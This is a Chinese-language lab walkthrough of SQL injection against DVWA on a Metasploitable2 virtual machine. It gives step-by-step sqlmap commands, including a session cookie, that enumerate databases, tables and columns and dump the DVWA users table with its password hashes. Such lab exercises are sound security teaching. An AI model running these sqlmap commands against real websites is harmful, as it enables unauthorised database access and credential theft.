SQL注入:DVWA+SQLmap+Mysql注入实战
实验环境搭建。启动Metasploitable2虚拟机。
环境搭建
启动Metasploitable2虚拟机后,查看虚拟机的IP地址
然后在火狐浏览器中输入Metasploitable2虚拟机的IP地址,打开后发现有DVWA
打开后将安全级别设为最低
然后再火狐中下载插件(cookie quick manager使用方法可以百度查找)来获取cookie
在【SQL Injection】项中提交ID为22(地址栏出现id=22,就是MySQL的注入点)
获得注入点为地址栏的内容。
同时在下载的插件中获取cookie值:
然后可以进行如下的操作了。
1、注入点发现。首先肯定是要判断是否有注入漏洞。
在输入框输入1,返回
ID:1
First name:admin
Surname:admin
返回正常
再次输入1’ ,报错,返回
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1
此时可以断定有SQL注入漏洞。
下面利用SQLMap进行注入攻击,同时将DVWA安全级别设置为最低;
2、枚举当前使用的数据库名称和用户名。
sqlmap语法参数:
-u:指定目标URL,即注入点
--cookies:当前会话的cookies值
-b:获取数据库类型,检索数据库管理系统标识
--current-db:获取当前数据库
--current-user:获取当前登录数据库使用的用户
你输入的命令:
sqlmap -u "http://192.168.91.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#"
--cookie='security=low;PHPSESSID=f95464a149677992803f0c569ed198bd'
-b --current-db --current-user
Sqlmap输出截图。
3、枚举数据库用户名和密码
-string:当查询可用时用来匹配页面中的字符串
-user:枚举DBMS用户
-password:枚举DBMS用户密码hash
你输入的命令:
sqlmap -u "http://192.168.91.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#"
--cookie='security=low;PHPSESSID=f95464a149677992803f0c569ed198bd'
--string="Surname" --users –password
Sqlmap输出截图。
4、枚举数据库
--dbs:枚举当前数据库
你输入的命令:
sqlmap -u "http://192.168.91.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#"
--cookie='security=low;PHPSESSID=f95464a149677992803f0c569ed198bd'
--string="Surname" –dbs
Sqlmap输出截图。
5、枚举数据库和指定数据库的数据表
-D 数据库名:指定数据库
--tables:枚举指定数据库的所有表
你输入的命令:
sqlmap -u "http://192.168.91.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#"
--cookie='security=low;PHPSESSID=f95464a149677992803f0c569ed198bd'
--string="Surname" -D dvwa –tables
Sqlmap输出截图。
6、获取指定数据库和表中所有列的信息
-D:指定的数据库
-T:指定数据库中的数据表
--columns:获取列的信息
你输入的命令:
sqlmap -u "http://192.168.91.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#"
--cookie='security=low;PHPSESSID=f95464a149677992803f0c569ed198bd'
--string="Surname" -D dvwa -T users –columns
Sqlmap输出截图。
7、枚举指定数据表中的所有用户名与密码,并down到本地。
-C:枚举数据表中的列
--dump:存储数据表项
你输入的命令:
sqlmap -u "http://192.168.91.129/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit#"
--cookie='security=low;PHPSESSID=f95464a149677992803f0c569ed198bd'
--string="Surname" -D dvwa -T users -C user,password –dump
Sqlmap输出截图。
查看down到本地的用户名与密码,截图。(提示带 . 的文件夹为隐藏,在图形命令下,用文件浏览器打开文件夹,按下ctrl+h组合键可显示隐藏文件和文件夹,在按一次取消显示)
cd 切换目录
vi 打开文本
方法:
通过在终端输入: cd /root/.local/share/sqlmap/output/192.168.91.129/dump/dvwa
然后再用 vi users.csv 打开即可